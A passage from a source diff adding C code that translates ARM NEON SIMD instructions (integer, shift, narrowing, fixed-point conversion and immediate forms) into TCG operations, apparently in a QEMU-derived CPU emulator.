tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qsub_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + case NEON_3R_VSHL: + if (u) { + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VQSHL: + if (u) { + gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VRSHL: + if (u) { + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VQRSHL: + if (u) { + gen_helper_neon_qrshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } else { + gen_helper_neon_qrshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VADD_VSUB: + if (u) { + tcg_gen_sub_i64(tcg_ctx, CPU_V001); + } else { + tcg_gen_add_i64(tcg_ctx, CPU_V001); + } + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + return 0; + } + pairwise = 0; + switch (op) { + case NEON_3R_VSHL: + case NEON_3R_VQSHL: + case NEON_3R_VRSHL: + case NEON_3R_VQRSHL: + { + int rtmp; + /* Shift instruction operands are reversed. */ + rtmp = rn; + rn = rm; + rm = rtmp; + } + break; + case NEON_3R_VPADD: + if (u) { + return 1; + } + /* Fall through */ + case NEON_3R_VPMAX: + case NEON_3R_VPMIN: + pairwise = 1; + break; + case NEON_3R_FLOAT_ARITH: + pairwise = (u && size < 2); /* if VPADD (float) */ + break; + case NEON_3R_FLOAT_MINMAX: + pairwise = u; /* if VPMIN/VPMAX (float) */ + break; + case NEON_3R_FLOAT_CMP: + if (!u && size) { + /* no encoding for U=0 C=1x */ + return 1; + } + break; + case NEON_3R_FLOAT_ACMP: + if (!u) { + return 1; + } + break; + case NEON_3R_FLOAT_MISC: + /* VMAXNM/VMINNM in ARMv8 */ + if (u && !arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + break; + case NEON_3R_VMUL: + if (u && (size != 0)) { + /* UNDEF on invalid size for polynomial subcase */ + return 1; + } + break; + case NEON_3R_VFM: + if (!arm_dc_feature(s, ARM_FEATURE_VFP4) || u) { + return 1; + } + break; + default: + break; + } + + if (pairwise && q) { + /* All the pairwise insns UNDEF if Q is set */ + return 1; + } + + for (pass = 0; pass < (q ? 4 : 2); pass++) { + + if (pairwise) { + /* Pairwise. */ + if (pass < 1) { + tmp = neon_load_reg(tcg_ctx, rn, 0); + tmp2 = neon_load_reg(tcg_ctx, rn, 1); + } else { + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + } + } else { + /* Elementwise. */ + tmp = neon_load_reg(tcg_ctx, rn, pass); + tmp2 = neon_load_reg(tcg_ctx, rm, pass); + } + switch (op) { + case NEON_3R_VHADD: + GEN_NEON_INTEGER_OP(hadd); + break; + case NEON_3R_VQADD: + GEN_NEON_INTEGER_OP_ENV(qadd); + break; + case NEON_3R_VRHADD: + GEN_NEON_INTEGER_OP(rhadd); + break; + case NEON_3R_LOGIC: /* Logic ops. */ + switch ((u << 2) | size) { + case 0: /* VAND */ + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 1: /* BIC */ + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 2: /* VORR */ + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 3: /* VORN */ + tcg_gen_orc_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 4: /* VEOR */ + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 5: /* VBSL */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp, tmp2, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case 6: /* VBIT */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp, tmp3, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case 7: /* VBIF */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + } + break; + case NEON_3R_VHSUB: + GEN_NEON_INTEGER_OP(hsub); + break; + case NEON_3R_VQSUB: + GEN_NEON_INTEGER_OP_ENV(qsub); + break; + case NEON_3R_VCGT: + GEN_NEON_INTEGER_OP(cgt); + break; + case NEON_3R_VCGE: + GEN_NEON_INTEGER_OP(cge); + break; + case NEON_3R_VSHL: + GEN_NEON_INTEGER_OP(shl); + break; + case NEON_3R_VQSHL: + GEN_NEON_INTEGER_OP_ENV(qshl); + break; + case NEON_3R_VRSHL: + GEN_NEON_INTEGER_OP(rshl); + break; + case NEON_3R_VQRSHL: + GEN_NEON_INTEGER_OP_ENV(qrshl); + break; + case NEON_3R_VMAX: + GEN_NEON_INTEGER_OP(max); + break; + case NEON_3R_VMIN: + GEN_NEON_INTEGER_OP(min); + break; + case NEON_3R_VABD: + GEN_NEON_INTEGER_OP(abd); + break; + case NEON_3R_VABA: + GEN_NEON_INTEGER_OP(abd); + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_add(s, size, tmp, tmp2); + break; + case NEON_3R_VADD_VSUB: + if (!u) { /* VADD */ + gen_neon_add(s, size, tmp, tmp2); + } else { /* VSUB */ + switch (size) { + case 0: gen_helper_neon_sub_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_sub_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VTST_VCEQ: + if (!u) { /* VTST */ + switch (size) { + case 0: gen_helper_neon_tst_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_tst_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_tst_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } else { /* VCEQ */ + switch (size) { + case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VML: /* VMLA, VMLAL, VMLS,VMLSL */ + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + if (u) { /* VMLS */ + gen_neon_rsb(s, size, tmp, tmp2); + } else { /* VMLA */ + gen_neon_add(s, size, tmp, tmp2); + } + break; + case NEON_3R_VMUL: + if (u) { /* polynomial */ + gen_helper_neon_mul_p8(tcg_ctx, tmp, tmp, tmp2); + } else { /* Integer */ + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VPMAX: + GEN_NEON_INTEGER_OP(pmax); + break; + case NEON_3R_VPMIN: + GEN_NEON_INTEGER_OP(pmin); + break; + case NEON_3R_VQDMULH_VQRDMULH: /* Multiply high. */ + if (!u) { /* VQDMULH */ + switch (size) { + case 1: + gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: abort(); + } + } else { /* VQRDMULH */ + switch (size) { + case 1: + gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: abort(); + } + } + break; + case NEON_3R_VPADD: + switch (size) { + case 0: gen_helper_neon_padd_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_padd_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + break; + case NEON_3R_FLOAT_ARITH: /* Floating point arithmetic. */ + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + switch ((u << 2) | size) { + case 0: /* VADD */ + case 4: /* VPADD */ + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + case 2: /* VSUB */ + gen_helper_vfp_subs(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + case 6: /* VABD */ + gen_helper_neon_abd_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + default: + abort(); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MULTIPLY: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); + if (!u) { + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + if (size == 0) { + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); + } + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_CMP: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (!u) { + gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + if (size == 0) { + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_ACMP: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_neon_acge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_neon_acgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MINMAX: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_vfp_maxs(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_mins(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MISC: + if (u) { + /* VMAXNM/VMINNM */ + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_vfp_maxnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_minnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + } else { + if (size == 0) { + gen_helper_recps_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); + } else { + gen_helper_rsqrts_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); + } + } + break; + case NEON_3R_VFM: + { + /* VFMA, VFMS: fused multiply-add */ + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + TCGv_i32 tmp3 = neon_load_reg(tcg_ctx, rd, pass); + if (size) { + /* VFMS */ + gen_helper_vfp_negs(tcg_ctx, tmp, tmp); + } + gen_helper_vfp_muladds(tcg_ctx, tmp, tmp, tmp2, tmp3, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + + /* Save the result. For elementwise operations we can put it + straight into the destination register. For pairwise operations + we have to be careful to avoid clobbering the source operands. */ + if (pairwise && rd == rm) { + neon_store_scratch(tcg_ctx, pass, tmp); + } else { + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + + } /* for pass */ + if (pairwise && rd == rm) { + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tmp = neon_load_scratch(tcg_ctx, pass); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + /* End of 3 register same size operations. */ + } else if (insn & (1 << 4)) { + if ((insn & 0x00380080) != 0) { + /* Two registers and shift. */ + op = (insn >> 8) & 0xf; + if (insn & (1 << 7)) { + /* 64-bit shift. */ + if (op > 7) { + return 1; + } + size = 3; + } else { + size = 2; + while ((insn & (1 << (size + 19))) == 0) + size--; + } + shift = (insn >> 16) & ((1 << (3 + size)) - 1); + /* To avoid excessive duplication of ops we implement shift + by immediate using the variable shift operations. */ + if (op < 8) { + /* Shift by immediate: + VSHR, VSRA, VRSHR, VRSRA, VSRI, VSHL, VQSHL, VQSHLU. */ + if (q && ((rd | rm) & 1)) { + return 1; + } + if (!u && (op == 4 || op == 6)) { + return 1; + } + /* Right shifts are encoded as N - shift, where N is the + element size in bits. */ + if (op <= 4) + shift = shift - (1 << (size + 3)); + if (size == 3) { + count = q + 1; + } else { + count = q ? 4: 2; + } + switch (size) { + case 0: + imm = (uint8_t) shift; + imm |= imm << 8; + imm |= imm << 16; + break; + case 1: + imm = (uint16_t) shift; + imm |= imm << 16; + break; + case 2: + case 3: + imm = shift; + break; + default: + abort(); + } + + for (pass = 0; pass < count; pass++) { + if (size == 3) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_V1, imm); + switch (op) { + case 0: /* VSHR */ + case 1: /* VSRA */ + if (u) + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + else + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 2: /* VRSHR */ + case 3: /* VRSRA */ + if (u) + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + else + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 4: /* VSRI */ + case 5: /* VSHL, VSLI */ + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 6: /* VQSHLU */ + gen_helper_neon_qshlu_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 7: /* VQSHL */ + if (u) { + gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + } + if (op == 1 || op == 3) { + /* Accumulate. */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else if (op == 4 || (op == 5 && u)) { + /* Insert */ + uint64_t mask; + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + if (shift < -63 || shift > 63) { + mask = 0; + } else { + if (op == 4) { + mask = 0xffffffffffffffffull >> -shift; + } else { + mask = 0xffffffffffffffffull << shift; + } + } + tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, ~mask); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else { /* size < 3 */ + /* Operands in T0 and T1. */ + tmp = neon_load_reg(tcg_ctx, rm, pass); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, imm); + switch (op) { + case 0: /* VSHR */ + case 1: /* VSRA */ + GEN_NEON_INTEGER_OP(shl); + break; + case 2: /* VRSHR */ + case 3: /* VRSRA */ + GEN_NEON_INTEGER_OP(rshl); + break; + case 4: /* VSRI */ + case 5: /* VSHL, VSLI */ + switch (size) { + case 0: gen_helper_neon_shl_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_shl_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_shl_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + break; + case 6: /* VQSHLU */ + switch (size) { + case 0: + gen_helper_neon_qshlu_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + case 1: + gen_helper_neon_qshlu_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + case 2: + gen_helper_neon_qshlu_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + default: + abort(); + } + break; + case 7: /* VQSHL */ + GEN_NEON_INTEGER_OP_ENV(qshl); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp2); + + if (op == 1 || op == 3) { + /* Accumulate. */ + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_add(s, size, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else if (op == 4 || (op == 5 && u)) { + /* Insert */ + switch (size) { + case 0: + if (op == 4) + mask = 0xff >> -shift; + else + mask = (uint8_t)(0xff << shift); + mask |= mask << 8; + mask |= mask << 16; + break; + case 1: + if (op == 4) + mask = 0xffff >> -shift; + else + mask = (uint16_t)(0xffff << shift); + mask |= mask << 16; + break; + case 2: + if (shift < -31 || shift > 31) { + mask = 0; + } else { + if (op == 4) + mask = 0xffffffffu >> -shift; + else + mask = 0xffffffffu << shift; + } + break; + default: + abort(); + } + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, ~mask); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } /* for pass */ + } else if (op < 10) { + /* Shift by immediate and narrow: + VSHRN, VRSHRN, VQSHRN, VQRSHRN. */ + int input_unsigned = (op == 8) ? !u : u; + if (rm & 1) { + return 1; + } + shift = shift - (1 << (size + 3)); + size++; + if (size == 3) { + tmp64 = tcg_const_i64(tcg_ctx, shift); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); + for (pass = 0; pass < 2; pass++) { + TCGv_i64 in; + if (pass == 0) { + in = tcg_ctx->cpu_V0; + } else { + in = tcg_ctx->cpu_V1; + } + if (q) { + if (input_unsigned) { + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } else { + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } + } else { + if (input_unsigned) { + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } else { + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } + } + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } /* for pass */ + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (size == 1) { + imm = (uint16_t)shift; + imm |= imm << 16; + } else { + /* size == 2 */ + imm = (uint32_t)shift; + } + tmp2 = tcg_const_i32(tcg_ctx, imm); + tmp4 = neon_load_reg(tcg_ctx, rm + 1, 0); + tmp5 = neon_load_reg(tcg_ctx, rm + 1, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 0) { + tmp = neon_load_reg(tcg_ctx, rm, 0); + } else { + tmp = tmp4; + } + gen_neon_shift_narrow(s, size, tmp, tmp2, q, + input_unsigned); + if (pass == 0) { + tmp3 = neon_load_reg(tcg_ctx, rm, 1); + } else { + tmp3 = tmp5; + } + gen_neon_shift_narrow(s, size, tmp3, tmp2, q, + input_unsigned); + tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp3); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } /* for pass */ + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else if (op == 10) { + /* VSHLL, VMOVL */ + if (q || (rd & 1)) { + return 1; + } + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 1) + tmp = tmp2; + + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, u); + + if (shift != 0) { + /* The shift is less than the width of the source + type, so we can just shift the whole register. */ + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, shift); + /* Widen the result of shift: we need to clear + * the potential overflow bits resulting from + * left bits of the narrow input appearing as + * right bits of left the neighbour narrow + * input. */ + if (size < 2 || !u) { + uint64_t imm64; + if (size == 0) { + imm = (0xffu >> (8 - shift)); + imm |= imm << 16; + } else if (size == 1) { + imm = 0xffff >> (16 - shift); + } else { + /* size == 2 */ + imm = 0xffffffff >> (32 - shift); + } + if (size < 2) { + imm64 = imm | (((uint64_t)imm) << 32); + } else { + imm64 = imm; + } + tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, ~imm64); + } + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + } else if (op >= 14) { + /* VCVT fixed-point. */ + if (!(insn & (1 << 21)) || (q && ((rd | rm) & 1))) { + return 1; + } + /* We have already masked out the must-be-1 top bit of imm6, + * hence this 32-shift where the ARM ARM has 64-imm6. + */ + shift = 32 - shift; + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, pass)); + if (!(op & 1)) { + if (u) + gen_vfp_ulto(s, 0, shift, 1); + else + gen_vfp_slto(s, 0, shift, 1); + } else { + if (u) + gen_vfp_toul(s, 0, shift, 1); + else + gen_vfp_tosl(s, 0, shift, 1); + } + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, pass)); + } + } else { + return 1; + } + } else { /* (insn & 0x00380080) == 0 */ + int invert; + if (q && (rd & 1)) { + return 1; + } + + op = (insn >> 8) & 0xf; + /* One register and immediate. */ + imm = (u << 7) | ((insn >> 12) & 0x70) | (insn & 0xf); + invert = (insn & (1 << 5)) != 0; + /* Note that op = 2,3,4,5,6,7,10,11,12,13 imm=0 is UNPREDICTABLE. + * We choose to not special-case this and will behave as if a + * valid constant encoding of 0 had been given. + */ + switch (op) { + case 0: case 1: + /* no-op */ + break; + case 2: case 3: + imm <<= 8; + break; + case 4: case 5: + imm <<= 16; + break; + case 6: case 7: + imm <<= 24; + break; + case 8: case 9: + imm |= imm << 16; + break; + case 10: case 11: + imm = (imm << 8) | (imm << 24); + break; + case 12: + imm = (imm << 8) | 0xff; + break; + case 13: + imm = (imm << 16) | 0xffff; + break; + case 14: + imm |= (imm << 8) | (imm << 16) | (imm << 24); + if (invert) + imm = ~imm; + break; + case 15: + if (invert) { + return 1; + } + imm = ((imm & 0x80) << 24) | ((imm & 0x3f) << 19) + | ((imm & 0x40) ? (0x1f << 25) : (1 << 30)); + break; + } + if (invert) + imm = ~imm; + + for (pass = 0; pass < (q ? 4 : 2); pass++) { + if (op & 1 && op < 12) { + tmp = neon_load_reg(tcg_ctx, rd, pass); + if (invert) { + /* The immediate value has already been inverted, so + BIC becomes AND. */ + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, imm); + } else { + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, imm); + } + } else { + /* VMOV, VMVN. */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (op == 14 && invert) { + int n; + uint32_t val; + val = 0; + for (n = 0; n < 4; n++) { + if (imm & (1 << (n + (pass & 1) * 4))) + val |= 0xffU << (n * 8); + } + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else { + tcg_gen_movi_i32(tcg_ctx, tmp, imm); + } + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + } else { /* (insn & 0x00800010 == 0x00800000) */ + if (size != 3) { + op = (insn >> 8) & 0xf; + if ((insn & (1 << 6)) == 0) { + /* Three registers of different lengths. */ + int src1_wide; + int src2_wide; + int prewiden; + /* undefreq: bit 0 : UNDEF if size == 0 + * bit 1 : UNDEF if size == 1 + * bit 2 : UNDEF if size == 2 + * bit 3 : UNDEF if U == 1 + * Note that [2:0] set implies 'always UNDEF' + */ + int undefreq; + /* prewiden, src1_wide, src2_wide, undefreq */ + static const int neon_3reg_wide[16][4] = { + {1, 0, 0, 0}, /* VADDL */ + {1, 1, 0, 0}, /* VADDW */ + {1, 0, 0, 0}, /* VSUBL */ + {1, 1, 0, 0}, /* VSUBW */ + {0, 1, 1, 0}, /* VADDHN */ + {0, 0, 0, 0}, /* VABAL */ + {0, 1, 1, 0}, /* VSUBHN */ + {0, 0, 0, 0}, /* VABDL */ + {0, 0, 0, 0}, /* VMLAL */ + {0, 0, 0, 9}, /* VQDMLAL */ + {0, 0, 0, 0}, /* VMLSL */ + {0, 0, 0, 9}, /* VQDMLSL */ + {0, 0, 0, 0}, /* Integer VMULL */ + {0, 0, 0, 1}, /* VQDMULL */ + {0, 0, 0, 0xa}, /* Polynomial VMULL */ + {0, 0, 0, 7}, /* Reserved: always UNDEF */ + }; + + prewiden = neon_3reg_wide[op][0]; + src1_wide = neon_3reg_wide[op][1]; + src2_wide = neon_3reg_wide[op][2]; + undefreq = neon_3reg_wide[op][3]; + + if ((undefreq & (1 << size)) || + ((undefreq & 8) && u)) { + return 1; + } + if ((src1_wide && (rn & 1)) || + (src2_wide && (rm & 1)) || + (!src2_wide && (rd & 1))) { + return 1; + } + + /* Handle VMULL.P64 (Polynomial 64x64 to 128 bit multiply) + * outside the loop below as it only performs a single pass. + */ + if (op == 14 && size == 2) { + TCGv_i64 tcg_rn, tcg_rm, tcg_rd; + + if (!arm_dc_feature(s, ARM_FEATURE_V8_PMULL)) { + return 1; + } + tcg_rn = tcg_temp_new_i64(tcg_ctx); + tcg_rm = tcg_temp_new_i64(tcg_ctx); + tcg_rd = tcg_temp_new_i64(tcg_ctx); + neon_load_reg64(tcg_ctx, tcg_rn, rn); + neon_load_reg64(tcg_ctx, tcg_rm, rm); + gen_helper_neon_pmull_64_lo(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + neon_store_reg64(tcg_ctx, tcg_rd, rd); + gen_helper_neon_pmull_64_hi(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + neon_store_reg64(tcg_ctx, tcg_rd, rd + 1); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rm); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + return 0; + } + + /* Avoid overlapping operands. Wide source operands are + always aligned so will never overlap with wide + destinations in problematic ways. */ + if (rd == rm && !src2_wide) { + tmp = neon_load_reg(tcg_ctx, rm, 1); + neon_store_scratch(tcg_ctx, 2, tmp); + } else if (rd == rn && !src1_wide) { + tmp = neon_load_reg(tcg_ctx, rn, 1); + neon_store_scratch(tcg_ctx, 2, tmp); + } + 